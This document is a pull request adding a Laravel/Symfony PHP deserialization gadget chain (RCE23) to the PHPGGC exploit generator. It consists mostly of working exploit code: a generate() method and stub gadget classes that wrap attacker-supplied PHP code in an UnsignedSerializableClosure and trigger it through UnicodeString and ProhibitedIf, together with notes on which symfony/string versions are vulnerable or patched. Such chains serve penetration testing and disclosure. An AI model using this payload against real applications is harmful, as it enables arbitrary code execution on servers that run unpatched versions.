### PR TITLE
Laravel/RCE23: PHP code execution via SerializableClosure + Symfony UnicodeString trampoline

### DIFF
--- a/gadgetchains/Laravel/RCE/23/chain.php
+++ b/gadgetchains/Laravel/RCE/23/chain.php
@@ -4,24 +4,26 @@ namespace GadgetChain\Laravel;
 
 class RCE23 extends \PHPGGC\GadgetChain\RCE\PHPCode
 {
-    public static $version = 'symfony/string 8.0.0 <= 8.0.11';
+    public static $version = 'symfony/string 7.4.0 <= 8.0.11';
     public static $vector = '__unserialize';
     public static $author = 'Mechazawa';
     public static $information = '
         Runs arbitrary PHP code through a serialized Laravel closure.
 
-        Symfony\\Component\\String\\UnicodeString is used as a trampoline: its
-        typed "string" property coerces the assigned object to a string during
-        __unserialize(), which triggers Illuminate\\Validation\\Rules\\ProhibitedIf::
-        __toString(). That calls the UnsignedSerializableClosure stored as its
+        Symfony\\Component\\String\\UnicodeString is used as a trampoline. When
+        __unserialize() runs $this->string = $data["string"], the value is
+        coerced to the typed "string" property, calling __toString() on the
+        assigned Illuminate\\Validation\\Rules\\ProhibitedIf. ProhibitedIf::
+        __toString() then invokes the UnsignedSerializableClosure stored as its
         condition, executing the wrapped closure (no signing key required).
 
-        Requires laravel/serializable-closure. The __unserialize() path (plain
-        "string" key) exists from symfony/string 8.0.0, which replaced the
-        __sleep/__wakeup() implementation. Symfony hardened the component to
-        reject Stringable objects during unserialization (2026-05-23), shipped
-        in 8.0.12 / 8.1.0 (and 7.4.13 / 6.4.39 for the __wakeup variant), so
-        patched releases are no longer affected.
+        Requires laravel/serializable-closure. Only symfony/string releases that
+        both type the "string" property and assign it inside __unserialize() are
+        affected: the 7.4 and 8.0 lines. Symfony hardened the component to reject
+        Stringable objects during unserialization (2026-05-23), shipped in
+        7.4.13 / 8.0.12 / 8.1.0, so patched releases are safe. 6.4 and earlier are
+        not affected, as the property is untyped there and the is_string() guard
+        in __wakeup() stops the chain.
     ';
 
     public function generate(array $parameters)

--- a/gadgetchains/Laravel/RCE/23/chain.php
+++ b/gadgetchains/Laravel/RCE/23/chain.php
@@ -1,0 +1,35 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE23 extends \PHPGGC\GadgetChain\RCE\PHPCode
+{
+    public static $version = 'symfony/string 8.0.0 <= 8.0.11';
+    public static $vector = '__unserialize';
+    public static $author = 'Mechazawa';
+    public static $information = '
+        Runs arbitrary PHP code through a serialized Laravel closure.
+
+        Symfony\\Component\\String\\UnicodeString is used as a trampoline: its
+        typed "string" property coerces the assigned object to a string during
+        __unserialize(), which triggers Illuminate\\Validation\\Rules\\ProhibitedIf::
+        __toString(). That calls the UnsignedSerializableClosure stored as its
+        condition, executing the wrapped closure (no signing key required).
+
+        Requires laravel/serializable-closure. The __unserialize() path (plain
+        "string" key) exists from symfony/string 8.0.0, which replaced the
+        __sleep/__wakeup() implementation. Symfony hardened the component to
+        reject Stringable objects during unserialization (2026-05-23), shipped
+        in 8.0.12 / 8.1.0 (and 7.4.13 / 6.4.39 for the __wakeup variant), so
+        patched releases are no longer affected.
+    ';
+
+    public function generate(array $parameters)
+    {
+        $native = new \Laravel\SerializableClosure\Serializers\Native($parameters['code']);
+        $closure = new \Laravel\SerializableClosure\UnsignedSerializableClosure($native);
+        $prohibited = new \Illuminate\Validation\Rules\ProhibitedIf($closure);
+
+        return new \Symfony\Component\String\UnicodeString($prohibited);
+    }
+}

--- a/gadgetchains/Laravel/RCE/23/gadgets.php
+++ b/gadgetchains/Laravel/RCE/23/gadgets.php
@@ -1,0 +1,64 @@
+<?php
+
+namespace Symfony\Component\String
+{
+    class UnicodeString
+    {
+        public $string;
+
+        public function __construct($string)
+        {
+            $this->string = $string;
+        }
+    }
+}
+
+namespace Illuminate\Validation\Rules
+{
+    class ProhibitedIf
+    {
+        public $condition;
+
+        public function __construct($condition)
+        {
+            $this->condition = $condition;
+        }
+    }
+}
+
+namespace Laravel\SerializableClosure
+{
+    class UnsignedSerializableClosure
+    {
+        public $serializable;
+
+        public function __construct($serializable)
+        {
+            $this->serializable = $serializable;
+        }
+    }
+}
+
+namespace Laravel\SerializableClosure\Serializers
+{
+    class Native
+    {
+        public $code;
+
+        public function __construct($code)
+        {
+            $this->code = $code;
+        }
+
+        public function __serialize()
+        {
+            return [
+                'use' => [],
+                'function' => 'static function () { ' . $this->code . ' }',
+                'scope' => null,
+                'this' => null,
+                'self' => '00000000000000050000000000000000',
+            ];
+        }
+    }
+}


### PR DESCRIPTION
I've reported this to both Symfony and Laravel but only Symfony fixed the issue on their side. I wouldn't be suprised if more paths like this exist